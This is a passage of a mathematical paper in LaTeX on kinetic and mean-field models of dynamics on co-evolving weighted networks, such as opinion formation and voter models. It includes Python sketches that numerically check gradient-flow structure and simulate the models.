E^N(s_1,\ldots,s_N,w_{12},\ldots,w_{N,N-1}) = \frac{1}{2N} \sum_{i=1}^N \sum_{j\neq i} \left( w_{ij} G(s_i-s_j) + \frac{\kappa w_{ij}^2}{2c}\right).
\end{equation}
A more general version of gradient flows is obtained with \eqref{eq:microscopicgf} and the more general energy functional
\begin{equation}
E^N(s_1,\ldots,s_N,w_{12},\ldots,w_{N,N-1}) = \frac{1}{2N} \sum_{i=1}^N \sum_{j\neq i} F(s_i,s_j,w_{ij} ) .
\end{equation}
This implies that the forces are derived from the potential $F$ via
\begin{equation} \label{eq:potential}
U(s,\sigma,w) = - \nabla_{s} F(s,\sigma,w), \qquad V(s,\sigma,w) = - c \partial_{w} F(s,\sigma,w).
\end{equation}
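For the canonical example \eqref{eq:Uexample}, \eqref{eq:Vexample} with $\eta=-cG$, the relations \eqref{eq:potential} can be verified by finite differences; the Gaussian choice of $G$ in the following sketch is an illustrative assumption:

```python
import numpy as np

kappa, c = 0.7, 1.3
G = lambda r: -np.exp(-r**2)                 # even potential; eta = -c*G is nonnegative
K = lambda r: 2*r*np.exp(-r**2)              # K = G', an odd kernel
F = lambda s, t, w: w*G(s - t) + kappa*w**2/(2*c)   # pairwise potential

U = lambda s, t, w: -w*K(s - t)              # canonical interaction force
V = lambda s, t, w: -c*G(s - t) - kappa*w    # eta - kappa*w with eta = -c*G

s, t, w, h = 0.4, -0.2, 0.9, 1e-6
dFs = (F(s + h, t, w) - F(s - h, t, w))/(2*h)        # central difference for d_s F
dFw = (F(s, t, w + h) - F(s, t, w - h))/(2*h)        # central difference for d_w F
print(abs(U(s, t, w) + dFs), abs(V(s, t, w) + c*dFw))  # both close to zero
```

Both residuals vanish up to discretisation error, confirming $U=-\nabla_s F$ and $V=-c\,\partial_w F$ for this choice.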
\subsection{The $N$-particle and weight measure}
In classical kinetic theory the evolution of the system is first described by the joint measure of the $N$ particles, which corresponds to $s_1, \ldots, s_N$. In our setting we need to extend this to a joint measure of the $N$ states $s_i$ and the $N(N-1)$ weights $w_{ij}$, which we denote by $\mu^N_t$ and still refer to as the $N$-particle measure.
The corresponding Liouville-type equation for $\mu^N_t$ is given by
\begin{equation} \label{eq:liouville}
\partial_t \mu^N_t + \frac{1}N \sum_i \sum_{j \neq i} \nabla_{s_i} \cdot ( U(s_i,s_j,w_{ij}) \mu_t^N )
+ \sum_i \sum_{j \neq i} \partial_{w_{ij}} \cdot ( V(s_i,s_j,w_{ij}) \mu_t^N ) = 0.
\end{equation}
The weak formulation of \eqref{eq:liouville} is given by
\begin{align}
\frac{d}{dt} \int \varphi(z_N) \mu_t^N(dz_N) =& \sum_i \sum_{j \neq i} \int ( \frac{1}N \nabla_{s_i} \varphi(z_N) U(s_i,s_j,w_{ij}) +
\nonumber \\ & \qquad \qquad
\partial_{w_{ij}} \varphi(z_N) V(s_i,s_j,w_{ij}) )\mu_t^N(dz_N) , \label{eq:liouvilleweak}
\end{align}
for $\varphi \in {\cal S}(\R^{Nm+N(N-1)})$.
For Lipschitz-continuous velocities $U$ and $V$ the existence and uniqueness of a weak solution follows in a straightforward way by the method of characteristics (cf. \cite{golse}): the solution $\mu_t^N$ is the push-forward of $\mu_0^N$ under the unique solutions $(s_i,w_{ij})$ of \eqref{eq:microscopic1}, \eqref{eq:microscopic2}.
In the case of forces derived from a potential $F$, i.e. \eqref{eq:potential}, the energy is given by
$$ E[\mu_t^N] = \frac{1}{2N} \sum_{i=1}^N \sum_{j\neq i} \int F(s_i,s_j,w_{ij}) ~\mu_t^N(dz_N) , $$
the gradient flow structure is propagated to the Liouville equation in an Otto-type geometry (cf. \cite{jko,otto}) as
\begin{align*}
\partial_t \mu^N_t &= \sum_i \nabla_{s_i} \cdot ( \mu_t^N \nabla_{s_i} E')
+ 2c N \sum_i \sum_{j \neq i} \partial_{w_{ij}} ( \mu_t^N \,\partial_{w_{ij}} E' ) ,
\end{align*}
where $E' = \frac{1}{2N} \sum_{i} \sum_{j\neq i} F(s_i,s_j,w_{ij})$ denotes the variational derivative $\frac{\delta E}{\delta \mu_t^N}$.
In particular we obtain an energy dissipation of the form
$$ \frac{d}{dt} E[\mu_t^N] = - \sum_i \sum_{j \neq i} \int \left( \vert\nabla_{s_i} F(s_i,s_j,w_{ij})\vert^2 + c (\partial_{w_{ij}}F(s_i,s_j,w_{ij}))^2 \right)~\mu_t^N(dz_N).$$
We will later return to the gradient flow structure and dissipation in the context of macroscopic equations and investigate their possible preservation.
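The decay of the microscopic energy along \eqref{eq:microscopicgf} is easy to observe numerically. The following sketch (with an illustrative Gaussian potential $G$, an assumption) integrates the gradient flow by explicit Euler steps and monitors $E^N$:

```python
import numpy as np

rng = np.random.default_rng(1)
N, c, kappa, dt = 10, 1.0, 1.0, 0.005
G = lambda r: -np.exp(-r**2)          # even potential; eta = -c*G is nonnegative
K = lambda r: 2*r*np.exp(-r**2)       # K = G'
s = rng.normal(size=N)
w = rng.uniform(size=(N, N)); w = (w + w.T)/2; np.fill_diagonal(w, 0.0)

def energy(s, w):                     # E^N = (1/2N) sum_{i, j != i} (w G + kappa w^2/(2c))
    r = s[:, None] - s[None, :]
    pair = w*G(r) + kappa*w**2/(2*c); np.fill_diagonal(pair, 0.0)
    return pair.sum()/(2*N)

E = [energy(s, w)]
for _ in range(400):
    r = s[:, None] - s[None, :]
    ds = -(w*K(r)).sum(axis=1)/N      # ds_i/dt = -(1/N) sum_j w_ij K(s_i - s_j)
    dw = -c*G(r) - kappa*w; np.fill_diagonal(dw, 0.0)   # dw/dt = eta - kappa w
    s += dt*ds; w += dt*dw
    E.append(energy(s, w))
E = np.array(E)
print(E[0], E[-1], (np.diff(E) <= 1e-12).all())   # energy is non-increasing
```

For a sufficiently small step size the discrete energy decreases monotonically, reflecting the dissipation structure above.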
\subsection{Time Scales}
Concerning time we can investigate different scaling limits, which effectively mean a relative scaling of the forces $U$ and $V$. We also discuss a third (mixed) case, which relates to the concept of network-structured models in the limit.
\subsubsection{Instantaneous Network Formation}
In some models the network is rebuilt on very small time scales. An extreme case with instantaneous network formation are early bounded confidence models of opinion formation such as the Hegselmann-Krause \cite{hegselmann} or
Deffuant-Weisbuch model \cite{deffuant}, where the network is rebuilt in each time step between all agents having opinions inside a certain confidence interval. In order to model such a situation it is convenient to introduce a small parameter $\epsilon > 0$ in \eqref{eq:microscopic2} and instead consider the scaled equation
\begin{equation}
\epsilon \frac{dw_{ij}}{dt} = V(s_i,s_j,w_{ij}) \label{eq:microscopic2a}
\end{equation}
The corresponding Liouville equation is given by
\begin{equation} \label{eq:liouvilleeps}
\partial_t \mu^N_t + \frac{1}N \sum_i \sum_{j \neq i} \nabla_{s_i} \cdot ( U(s_i,s_j,w_{ij}) \mu_t^N )
+ \frac{1}\epsilon \sum_i \sum_{j \neq i} \partial_{w_{ij}} \cdot ( V(s_i,s_j,w_{ij}) \mu_t^N ) = 0.
\end{equation}
In the simplest case there exists a unique solution $\omega(s,\sigma)$ of the equation
\begin{equation} \label{eq:omega}
V(s,\sigma,\omega(s,\sigma)) = 0
\end{equation}
and we expect convergence to the reduced equation
\begin{equation}
\partial_t \mu^N_t + \frac{1}N \sum_i \sum_{j \neq i} \nabla_{s_i} \cdot ( U(s_i,s_j,\omega(s_i,s_j)) \mu_t^N ) = 0
\end{equation}
under suitable properties of $V$. This equation is in the standard form of interaction equations for the particles $s_i$ that can be described by a mean-field limit (cf. \cite{golse}).
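For the canonical choice \eqref{eq:Vexample} the equation \eqref{eq:omega} has the explicit solution $\omega(s,\sigma)=\eta(s-\sigma)/\kappa$, and the collapse of the weight onto this root (for frozen states) can be checked directly; the Gaussian $\eta$ is an illustrative assumption:

```python
import numpy as np

kappa = 2.0
eta   = lambda r: np.exp(-r**2)
V     = lambda s, t, w: eta(s - t) - kappa*w
omega = lambda s, t: eta(s - t)/kappa        # unique root of V(s, t, .) = 0

s, t, eps, dt = 0.3, -0.5, 1e-2, 1e-4        # frozen states, small epsilon
w = 0.0
for _ in range(20000):                       # integrate eps * dw/dt = V(s, t, w)
    w += (dt/eps)*V(s, t, w)

print(abs(w - omega(s, t)))   # the weight has relaxed onto omega(s, t)
```

The relaxation time is $O(\epsilon/\kappa)$, so on the slow time scale the weight is slaved to the states, as used in the reduced equation.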
Note that we can also study the problem at a fast time scale (rescaled from $t$ to $\epsilon^{-1}t$), which corresponds to \eqref{eq:microscopic2} coupled with
$$\frac{ds_i}{dt} = \epsilon \frac{1}N \sum_{j \neq i} U(s_i,s_j,w_{ij}). $$
Apparently the limit is given by stationary states $s$ at this scale, and thus \eqref{eq:microscopic2} is a pure network adaptation model in a given environment
$$ \frac{dw_{ij}}{dt}(t) = V(s_i,s_j,w_{ij}(t)) = V_{ij}(w_{ij}(t)). $$
\subsubsection{Instantaneous State Adaptation}
The opposite time scale is related to a fast adaptation of states instead of the weights. This amounts to \eqref{eq:microscopic2} coupled with
\begin{equation}
\epsilon \frac{ds_i}{dt} = \frac{1}N \sum_{j \neq i} U(s_i,s_j,w_{ij}).
\end{equation}
The limit $\epsilon \rightarrow 0$ is much more complicated in this case compared to the instantaneous network adaptation. Formally it is described by $\sum_{j \neq i} U(s_i,s_j,w_{ij})=0$, which is a fully coupled system among the states and weights.
At a fast time scale we obtain instead stationarity of the weights $w_{ij}$, and hence the state adaptation is a standard interacting particle system (albeit in a heterogeneous environment)
\begin{equation}
\frac{ds_i}{dt}(t) = \frac{1}N \sum_{j \neq i} U(s_i(t),s_j(t),w_{ij}) =
\frac{1}N \sum_{j \neq i} U_{ij}(s_i(t),s_j(t) ).
\end{equation}
The mathematical complication in a limit of this system for large $N$ is inherent in the fact that the particles are no longer indistinguishable due to the specific forces $U_{ij}$.
\subsubsection{Network-Structured Models}
Let us finally consider a case where the state is composed of two distinct parts $s_i=(x_i,y_i)$ such that
$V$ depends only on the first part $x_i$. If we now consider a fast adaptation in the $x$-part as well as in the weights, the effective limit provides stationary weights $w_{ij} = \omega(x_i,x_j)$ and the remaining equation for the $y$-components becomes (with $U^Y$ the corresponding component of the force $U$)
\begin{equation}
\frac{dy_i}{dt}(t) = \frac{1}N \sum_{j \neq i} U^Y(x_i,y_i(t),x_j,y_j(t),\omega(x_i,x_j)) =
\frac{1}N \sum_{j \neq i} \tilde U(x_i,x_j;y_i(t),y_j(t)).
\end{equation}
This corresponds to the framework of network-structured models derived in \cite{burger2}.
\section{Microscopic Models for Processes on Co-Evolving Networks}
We consider finite weighted graphs ${\cal G}^N(t) =({\cal V},{\cal E}(t),w(t))$, $t \in \R_+$ with $N$ vertices and symmetric edge weights $w_{ij}(t)$ evolving in time. Moreover, we consider a vertex function $s:{\cal V} \times \R_+ \rightarrow \R^m$. The value $s_i(t)$ describes the state of agent $i$ (identified with the respective vertex) at time $t$. Setting $w_{ij}(t) = 0 $ for $(i,j) \notin {\cal E}(t)$, we can equivalently describe such a graph by $(s,w) \in {\cal S}^N \times {\cal W}^N$, where ${\cal S}^N$ is a subset of $\R^{mN}$ and ${\cal W}^N$ is a subset of $\R^{N \times N}$. The exact shape of ${\cal W}^N$ depends on the specific model, e.g. we can restrict to nonnegative weights or include the case of an unweighted graph by choosing ${\cal W}^N = \{0,1\}^{N \times N}$.
We mention that for undirected graphs we can use the symmetry of $w$ and avoid loops by setting $w_{ii}=0$; in this case the description can even be reduced to an element of $\R^{mN + N(N-1)/2}$. Starting from the weights $w$ we say that there is an edge or link between $i$ and $j$ if $w_{ij} \neq 0$.
The microscopic description of the process and the co-evolving network can be carried out by using a probability measure $\mu^N_t$ on ${\cal S}^N \times {\cal W}^N$ for $t \in \R_+$ and formulating an evolution equation for $\mu^N$. We will now first derive a general model structure and then pass to some other special cases based on examples from literature.
\subsection{General Model Structure}
In the following we provide a general structure for the microscopic kinetic models, including continuum structures as in the paradigmatic model above, but also operators arising from long-range jumps (e.g. abrupt changes of weights or states) and discrete models such as binary
${\cal W} = \{0,1\}$. In addition we consider a random (diffusive) change of states or weights, possibly again depending on the variables themselves, which yields
\begin{align}
\partial_t \mu_t^N =& \frac{1}N \sum_{i=1}^N \sum_{j\neq i} D_{s_i}^* (U(s_i,s_j,w_{ij}) \mu_t^N) + \sum_{i=1}^N \sum_{j\neq i} D_{w_{ij}}^* (V(s_i,s_j,w_{ij}) \mu_t^N) \nonumber \\
& + \sum_{i=1}^N D_{s_i}^* (U_0(s_i) \mu_t^N) - \sum_{i=1}^N D_{s_i}^* D_{s_i} (Q(s_i) \mu_t^N) - \sum_{i=1}^N \sum_{j\neq i} D_{w_{ij}}^*D_{w_{ij}}(R(s_i,s_j,w_{ij}) \mu_t^N). \label{eq:general}
\end{align}
A variety of different models of the above kind can be found in literature, below we will show how to put them into this general structure.
\subsection{Important Cases}
\subsubsection{Continuous State and Weight Model with State Diffusion }
A slight variation of the paradigmatic model is obtained when adding a random change of the state variable via a Wiener process (with effective diffusion coefficient $Q$), which leads to
\begin{align}
&\partial_t \mu_t^N + \frac{1}N \sum_{i=1}^N \sum_{j\neq i} \nabla_{s_i} \cdot (U(s_i,s_j,w_{ij}) \mu_t^N) + \sum_{i=1}^N \sum_{j\neq i} \partial_{w_{ij}} (V(s_i,s_j,w_{ij}) \mu_t^N) \nonumber \\
& \qquad = -\sum_{i=1}^N \nabla_{s_i} \cdot (U_0(s_i) \mu_t^N) +\sum_{i=1}^N \Delta_{s_i} (Q(s_i) \mu_t^N) .
\end{align}
Here $D_{s_i} = \nabla$ and $D_{s_i}^*= - \nabla \cdot$. In particular in opinion formation models the impact of noise in the state variable has been highlighted in recent years (cf. \cite{carro,raducha}), and it is incorporated in the additional diffusion term. We give a recent example of an agent-based model combining noise with network co-evolution:
\begin{example}
In \cite{boschi} a completely continuous model is studied, given by (with the rescaled weights $w_{ij} = N J_{ij}$)
\begin{align*}
ds_i &= - s_i dt + I_i dt + \frac{1}N \sum_{j \neq i} w_{ij} g(s_j) dt + \sigma dW_i \\
dw_{ij} &= \gamma ( J_0 g(s_i) g(s_j) - w_{ij}) dt
\end{align*}
where the $W_i$ are uncorrelated Wiener processes, $\gamma$ and $J_0$ are positive functions, $g$ is a sigmoidal function, and $I_i$ models external influence by media.
Here the state space is ${\cal S}=\R$ and the weight space is ${\cal W}=\R^+$, one easily notices that the dynamics of the weights $w_{ij}$ cannot lead to a negative value if $g$ is a nonnegative function. The arising equation for $\mu_t^N$, ignoring the external influence $I$, is given by
\begin{align} \label{eq:boschi}
\partial_t \mu^N_t =& - \sum_{i=1}^N \nabla_{s_i} \cdot \Big( \big(- s_i + \frac{1}N \sum_{j \neq i} w_{ij} g(s_j)\big) \mu_t^N \Big)
\nonumber \\ & - \sum_{i=1}^N \sum_{j \neq i} \partial_{w_{ij}} \big( \gamma ( J_0 g(s_i) g(s_j) - w_{ij}) \mu_t^N \big) + \frac{\sigma^2}2 \sum_{i=1}^N \Delta_{s_i} \mu_t^N.
\end{align}
We see that \eqref{eq:boschi} is a special case of \eqref{eq:general} with diffusion coefficients $Q=\frac{\sigma^2}2$, $R=0$, external force $U_0(s_i) = - s_i$ and interactions
$$ U(s_i,s_j,w_{ij}) = w_{ij} g(s_j), \qquad V(s_i,s_j,w_{ij}) =\gamma ( J_0 g(s_i) g(s_j) - w_{ij}) .$$
\end{example}
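A direct Euler--Maruyama discretisation of this system (a sketch only, not the scheme used in \cite{boschi}; a logistic sigmoid $g$ and unit parameters are assumed) illustrates in particular that the weight dynamics cannot produce negative values for nonnegative $g$:

```python
import numpy as np

rng = np.random.default_rng(2)
N, dt, steps = 30, 1e-3, 2000
gamma, J0, sigma = 1.0, 1.0, 0.3
g = lambda s: 1/(1 + np.exp(-s))             # a nonnegative sigmoidal function
s = rng.normal(size=N)
w = rng.uniform(size=(N, N)); np.fill_diagonal(w, 0.0)

wmin = np.inf
for _ in range(steps):
    gs = g(s)
    drift_s = -s + (w @ gs)/N                # -s_i + (1/N) sum_j w_ij g(s_j)
    s = s + dt*drift_s + sigma*np.sqrt(dt)*rng.normal(size=N)
    w = w + dt*gamma*(J0*np.outer(gs, gs) - w)
    np.fill_diagonal(w, 0.0)
    wmin = min(wmin, w.min())

print(wmin >= 0.0)   # True: the explicit step is a convex combination for gamma*dt <= 1
```

Each weight update reads $w_{k+1} = (1-\gamma\,dt)\,w_k + \gamma\,dt\, J_0\, g(s_i)g(s_j) \ge 0$, which makes the nonnegativity explicit at the discrete level as well.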
\subsubsection{Continuous States and Binary Weights}
An important case arising in many models is the one of a continuous state space ${\cal S}$ combined with an unweighted graph, which can be rephrased as a set of binary weights ${\cal W}=\{0,1\}$. A corresponding formulation of the kinetic model is given by
\begin{equation}
\partial_t \mu^N_t + \frac{1}N \sum_{i=1}^N \sum_{j\neq i} \nabla_{s_i} \cdot (U(s_i,s_j,w_{ij}) \mu_t^N) =
\sum_{i=1}^N \sum_{j\neq i} (V(s_i,s_j,w_{ij}') \mu_t^{N,ij} - V(s_i,s_j,w_{ij} ) \mu_t^N),
\end{equation}
where $w_{ij}'=1-w_{ij}$ and $\mu_t^{N,ij}$ equals $\mu_t^N$ with argument $w_{ij}$ changed to $w_{ij}'$.
In this case $D_{s_i} = \nabla_{s_i}$ and
$$ D_{w_{ij}}^* \varphi = \varphi^{ij} - \varphi, $$
where $\varphi^{ij}$ denotes the evaluation of $\varphi$ with argument $w_{ij}$ changed to $w_{ij}'$.
\begin{example}In recent variants of bounded confidence models an averaging process of the form
\begin{equation}
ds_i = \frac{1}N \sum_{j \neq i} w_{ij} (F(s_j) - s_i)~dt
\end{equation}
is carried out on opinions with a linear or nonlinear function $F: \R^+ \rightarrow \R^+$, e.g. $F(s) = k \tanh(\alpha s)$ as in \cite{baumann}. A new edge between $i$ and $j$ is established with rate $\frac{1}\tau r(|s_i-s_j|)$, with $\tau$ a small relaxation time and $r$ a decreasing function on $\R^+$. Links are removed quickly as well, again corresponding to a rate $\frac{1}\tau$. Thus, we obtain a special case of \eqref{eq:general} with ${\cal S}=\R^+$, ${\cal W}=\{0,1\}$, $U_0=Q=R=0$ and
$$ U(s_i,s_j,w_{ij}) = w_{ij}(F(s_j) - s_i), \qquad V(s_i,s_j,w_{ij}) = \frac{1}\tau (r( |s_i-s_j|) - w_{ij}). $$
In the limit $\tau \rightarrow 0$ we recover bounded confidence models like the celebrated Hegselmann-Krause model \cite{hegselmann} with weight $w_{ij} = r( |s_i-s_j|). $
\end{example}
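A minimal simulation sketch of this averaging/rewiring dynamics may be helpful (all parameters are hypothetical; the binary link process is replaced by its relaxation towards $r(|s_i-s_j|)$, mimicking the small-$\tau$ regime):

```python
import numpy as np

# Euler sketch of the bounded-confidence co-evolution: opinions average over
# weighted neighbours with F(s) = k*tanh(alpha*s); weights relax at rate 1/tau
# towards r(|s_i - s_j|). All parameter values are hypothetical.
rng = np.random.default_rng(1)
N, dt, steps = 40, 0.01, 2000
k, alpha, tau, eps = 1.0, 2.0, 0.05, 0.5
F = lambda s: k * np.tanh(alpha * s)
r = lambda d: (d < eps).astype(float)      # decreasing confidence function

s = rng.uniform(0.0, 1.0, N)               # opinions in S = R^+
w = rng.integers(0, 2, (N, N)).astype(float)
np.fill_diagonal(w, 0.0)

for _ in range(steps):
    drift = (w * (F(s)[None, :] - s[:, None])).sum(axis=1) / N
    d = np.abs(s[:, None] - s[None, :])
    w = w + (r(d) - w) * dt / tau          # relaxation of links towards r
    np.fill_diagonal(w, 0.0)
    s = s + drift * dt
```

In the limit $\tau \rightarrow 0$ the weights track $r(|s_i-s_j|)$ and one recovers Hegselmann--Krause-type dynamics, as noted above.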
\subsubsection{Discrete States and Binary Weights}
A variety of models (cf. \cite{benatti,maia,min,pham,pham2,raducha,thurner0,thurner}) are based on discrete states (often binary ${\cal S}=\{-1,1\}$) and binary weights (${\cal W}=\{0,1\}$); the interactions are consequently a switching of states between connected particles ($w_{ij}=1$) and the addition and removal of links (changes of weights between $0$ and $1$ depending on the states). The corresponding evolution of the $N$-particle and weight distribution is thus described by
\begin{align*}
\partial_t \mu_t^N =& \frac{1}N \sum_{i=1}^N \sum_{j \neq i} \left(\sum_{s_j^* \in {P(s_i)}} U(s_i^*,s_j^*,w_{ij}) \mu_t^{N,s,ij}-U(s_i,s_j,w_{ij}) \mu_t^N \right) +
\\ & \sum_{i=1}^N \sum_{j \neq i} (V(s_i,s_j,w_{ij}') \mu_t^{N,w,ij} -V(s_i,s_j,w_{ij}) \mu_t^N)
\end{align*}
where $P(s_i)$ is the set of pre-collisional states $s_j^*$ such that there exists $s_i^* \in {\cal S}$, whose interaction with $s_j^*$ leads to post-collisional state $s_i$.
\begin{example}
The co-evolving voter model, as considered in \cite{min,raducha,thurner0,thurner}, is a generic example of a discrete state and weight model. Originally it is formulated in discrete time steps, where in each step a node is picked at random. Then a neighbouring node is chosen, whose state $s^*$ is compared with the state $s$ of the original node. If $s$ and $s^*$ differ, the link is removed (i.e. the weight is changed from one to zero) with probability $p$, while with probability $1-p$ the state $s$ is changed to $s'$. In the first case another node is chosen randomly and connected to the first one if it has the same state $s$. As a continuous-time analogue (with exponentially distributed waiting times between events) we obtain the $N$-particle equation
\begin{align}
\partial_t \mu_t^N =& \frac{1}N \sum_{i=1}^N p\left( \sum_{j \neq i, w_{ij}=0, s_j \neq s_i} \frac{\sum_{k \neq i,j, w_{ik}=1, s_k = s_i}\mu_t^{N,ijk}}{\sum_{k \neq i,j, w_{ik}=1, s_k = s_i} 1} -
\sum_{j \neq i, w_{ij}=1, s_j \neq s_i} \mu_t^N \right) + \nonumber
\\ & \frac{1}N \sum_{i=1}^N (1-p) \left( \sum_{j \neq i, w_{ij}=1, s_j = s_i} \mu_t^{N,i} - \sum_{j \neq i, w_{ij}=1, s_j \neq s_i} \mu_t^N\right) \\
=& \frac{1-p}N \sum_{i=1}^N \sum_{j \neq i} w_{ij} (\mu_t^{N,i} |s_j -s_i'| - \mu_t^{N } |s_j -s_i | ) + \nonumber \\&
\frac{ p}N \sum_{i=1}^N \sum_{j \neq i} \left( w_{ij}' |s_j-s_i|\frac{\sum_{k \neq i,j}w_{ik} |s_k - s_i'| \mu_t^{N,ijk} }{\sum_{k \neq i,j } w_{ik} |s_k - s_i'|} - w_{ij}|s_j-s_i| \mu_t^N\right) \nonumber
\end{align}
Here $\mu_t^{N,i}$ denotes $\mu_t^N$ with state $s_i$ changed to $s_i'$ and $\mu_t^{N,ijk}$ with weights $w_{ij}, w_{ik}$ changed to
$w_{ij}', w_{ik}'$.
This fits into the modelling using
$$ D_{s_i} \varphi = \varphi^i - \varphi, \quad D_{w_{ij}} \varphi = \varphi^{ij} - \varphi $$
and $ U(s_i,s_j,w_{ij}) = (1-p) w_{ij} |s_i-s_j|$, up to the three particle interaction with $k$.
We can also consider a variant where a link to a neighbouring node is changed with probability $pq$ and a link to a new node is established with probability $p(1-q)$, which leads to
\begin{align}
\partial_t \mu_t^N
=& \frac{1-p}N \sum_{i=1}^N \sum_{j \neq i} w_{ij} (\mu_t^{N,i} |s_j -s_i'| - \mu_t^{N } |s_j -s_i | ) + \nonumber \\&
{ pq} \sum_{i=1}^N \sum_{j \neq i} \left( w_{ij}' |s_j-s_i| \mu_t^{N,ij} - w_{ij}|s_j-s_i| \mu_t^N\right) + \nonumber \\&
{ p(1-q)} \sum_{i=1}^N \sum_{j \neq i} \left( w_{ij}' |s_j-s_i'| \mu_t^{N,ij} - w_{ij}|s_j-s_i'| \mu_t^N\right) .
\end{align}
Here we exactly obtain a special case of \eqref{eq:general} with the above discrete operators $D_{s_i}$ and $D_{w_{ij}}$ as well as the potentials
\begin{equation}
U(s_i,s_j,w_{ij}) = (1-p) w_{ij}|s_j -s_i |, \quad V(s_i,s_j,w_{ij}) = p w_{ij}( q |s_j -s_i | + (1-q)|s_j -s_i' |).
\end{equation}
\end{example}
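The discrete-time formulation of the co-evolving voter model described above can be sketched directly as an agent-based simulation (graph size, probability $p$, and the number of steps below are hypothetical choices):

```python
import random

# one update of the co-evolving voter model: pick a node, pick a neighbour;
# if states differ, rewire with probability p (reconnect to a same-state node),
# otherwise adopt the neighbour's state
def voter_step(states, nbrs, p, rng):
    i = rng.randrange(len(states))
    if not nbrs[i]:
        return
    j = rng.choice(sorted(nbrs[i]))
    if states[i] == states[j]:
        return
    if rng.random() < p:                    # rewire
        nbrs[i].discard(j)
        nbrs[j].discard(i)
        cands = [k for k in range(len(states))
                 if k != i and states[k] == states[i] and k not in nbrs[i]]
        if cands:
            k = rng.choice(cands)
            nbrs[i].add(k)
            nbrs[k].add(i)
    else:                                   # adopt neighbour's state
        states[i] = states[j]

rng = random.Random(3)
N = 60
states = [rng.choice([-1, 1]) for _ in range(N)]
nbrs = [set() for _ in range(N)]
for _ in range(3 * N):                      # random initial undirected graph
    a, b = rng.randrange(N), rng.randrange(N)
    if a != b:
        nbrs[a].add(b)
        nbrs[b].add(a)

for _ in range(20000):
    voter_step(states, nbrs, 0.5, rng)

# "active" links connect nodes of different states; the dynamics absorb once
# no active links remain (consensus or fragmentation)
active = sum(1 for i in range(N) for j in nbrs[i] if states[i] != states[j])
```

The fraction of active links plays the role of $f_{+-}$ in the kinetic description below.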
\begin{example} {\bf A Minimal Model. }
As a basis for further analysis we consider a minimal model with binary states ${\cal S} = \{-1,1\}$ and binary weights ${\cal W}=\{0,1\}$, where interaction between states only appears between nodes that are connected ($w_{ij}=1$). This leads to an equation of the form
\begin{align}
\partial_t \mu_t^N =& \frac{1}N \sum_{i=1}^N \sum_{j \neq i} w_{ij}( \alpha(s_i',s_j) \mu_t^{N,i}-\alpha(s_i,s_j) \mu_t^N ) + \nonumber
\\ & \sum_{i=1}^N \sum_{j \neq i} \left( \beta(s_i,s_j) (w_{ij}\mu_t^{N, ij} - w_{ij}' \mu_t^N) + \gamma(s_i,s_j) (w_{ij}'\mu_t^{N, ij} - w_{ij} \mu_t^N) \right) , \label{eq:minimal}
\end{align}
where $\alpha$ is the rate of changing states, $\beta$ the rate to establish links and $\gamma$ the rate of removing links.
Here we denote by $ \mu_t^{N,i}$ the version of $\mu_t^{N}$ with argument $s_i'=-s_i$ instead of $s_i$ and by $\mu_t^{N, ij} $ the version with argument $w_{ij}'=1-w_{ij}$ instead of $w_{ij}$.
\end{example}
\section{Moment Hierarchies and Closure Relations}
The classical transition from microscopic to macroscopic models in kinetic theory is based on a hierarchy of moments, also called {\em BBGKY hierarchy} in the standard setting (cf. \cite{cercignani3,golse,spohn}) or {\em Vlasov hierarchy} in the mean-field setting (cf. \cite{golsemouhot,spohnneunzert}). We want to derive a similar approach in the following, where we have to take into account the additional dependence on the weights however. For the sake of simpler exposition and notation we will restrict ourselves to the case of an undirected graph without loops, but an analogous treatment is possible for directed weighted graphs. Our approach will be to consider a system of moments for $k$ vertices and the corresponding edge weights between them. This means the first moment just depends on $s_1$, the second on $s_1, s_2$ and $w_{12}$, and the $k$-th on $k$ states and
$\frac{k(k-1)}2$ weights.
Let us denote by $z_k = (s_i,w_{ij})_{1 \leq i,j \leq k, i \neq j}$ a vector corresponding to the first $k$ states and the weights between them and by $z^{N,k}$ the full vector of states and weights without $z_k$. Then we define the corresponding moment
\begin{equation}
\mu^{N:k}_t = \int \mu^N_t(dz^{N,k}),
\end{equation}
with the obvious modification to a sum in the case of a discrete measure.
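For a small discrete system the moments $\mu_t^{N:k}$ are plain marginalisations, which can be illustrated directly (a hypothetical $N=3$ system with binary states and weights):

```python
import numpy as np

# mu^N for N=3 binary states/weights is an array over (s1, s2, s3, w12, w13, w23);
# the moment mu^{N:2} keeps (s1, s2, w12) and integrates out s3, w13, w23
rng = np.random.default_rng(2)
mu = rng.random((2, 2, 2, 2, 2, 2))
mu /= mu.sum()                              # normalise to a probability measure

mu_2 = mu.sum(axis=(2, 4, 5))               # mu^{N:2}(s1, s2, w12)
mu_1 = mu.sum(axis=(1, 2, 3, 4, 5))         # mu^{N:1}(s1)
```

The consistency of the hierarchy is visible here: integrating $\mu^{N:2}$ over $s_2$ and $w_{12}$ returns $\mu^{N:1}$.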
Integrating \eqref{eq:liouville} we actually see that the moments $\mu^{N:k}_t$, $k=1,\ldots,N$, satisfy a closed system of equations, namely
\begin{align}
& \partial_t \mu^{N:k}_t = \frac{1}N \sum_{i \leq k} \sum_{j \neq i, j \leq k} D_{s_i}^* ( U(s_i,s_j,w_{ij}) \mu_t^{N:k} )
+ \sum_{i \leq k} \sum_{j \neq i, j \leq k} D_{w_{ij}}^* ( V(s_i,s_j,w_{ij}) \mu_t^{N:k} )
\nonumber \\ & \qquad \qquad + \frac{N-k}N \sum_{i \leq k} D_{s_i}^* \left( \int U(s_i,s_{k+1},w_{ik+1}) \mu_t^{N:k+1} (dz^{k+1,k}) \right)
+ \sum_{i \leq k} D_{s_i}^* (U_0(s_i) \mu_t^{N:k}) \nonumber \\ & \qquad \qquad - \sum_{i\leq k} D_{s_i}^* D_{s_i} (Q(s_i) \mu_t^{N:k}) - \sum_{i\leq k} \sum_{j \neq i, j \leq k} D_{w_{ij}}^*D_{w_{ij}}(R(s_i,s_j,w_{ij}) \mu_t^{N:k}),
\end{align}
where the integration with the measure $ \mu_t^{N:k+1} $ is over the variables $z^{k+1,k}=(s_{k+1},w_{1\,k+1},\ldots,w_{k\,k+1})$.
\subsection{Infinite Hierarchy}
In the limit $N\rightarrow \infty$ we formally obtain the infinite system
\begin{align}
& \partial_t \mu^{\infty:k}_t = \sum_{i \leq k} D_{s_i}^* ( \int U(s_i,s_{k+1},w_{ik+1}) \mu_t^{\infty:k+1}(dz^{k+1,k}) )
\nonumber \\ & \qquad \qquad + \sum_{i \leq k} \sum_{j \neq i, j \leq k} D_{w_{ij}}^* ( V(s_i,s_j,w_{ij}) \mu_t^{\infty:k} )
